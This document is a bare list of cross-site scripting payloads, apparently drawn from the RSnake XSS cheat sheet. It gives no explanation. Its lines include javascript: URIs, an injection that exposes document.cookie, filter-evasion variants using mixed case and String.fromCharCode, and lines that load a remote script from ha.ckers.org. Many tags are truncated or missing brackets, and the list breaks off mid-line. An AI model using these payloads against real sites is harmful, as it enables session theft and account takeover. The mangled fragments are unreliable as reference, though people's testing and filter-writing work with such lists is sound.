javascript:alert(/8/);
>
123');alert(document.cookie);('
>
">
'>Click Me For
> Google<>
prettyPhoto/2,/
String.fromCharCode(60)scriptString.fromCalert(String.fromCharCode(34)XSSString.fromCharCode(34))String.fromCharCode(60)/scriptS
;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
>">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
SCRIPT SRC=http://ha.ckers.org/xss.js>
IMG SRC=javascript:alert('XSS')>
IMG SRC=JaVaScRiPt:alert('XSS')>
IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
IMG SRC=javascript:alert('XSS')>
MG SRC="jav ascript:alert('XSS');">
IMG SRC="jav
ascript:alert('XSS');">
IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "'" SRC="http://ha.ckers.org/xss.js">
` SRC="http://ha.ckers.org/xss.js">
document.write("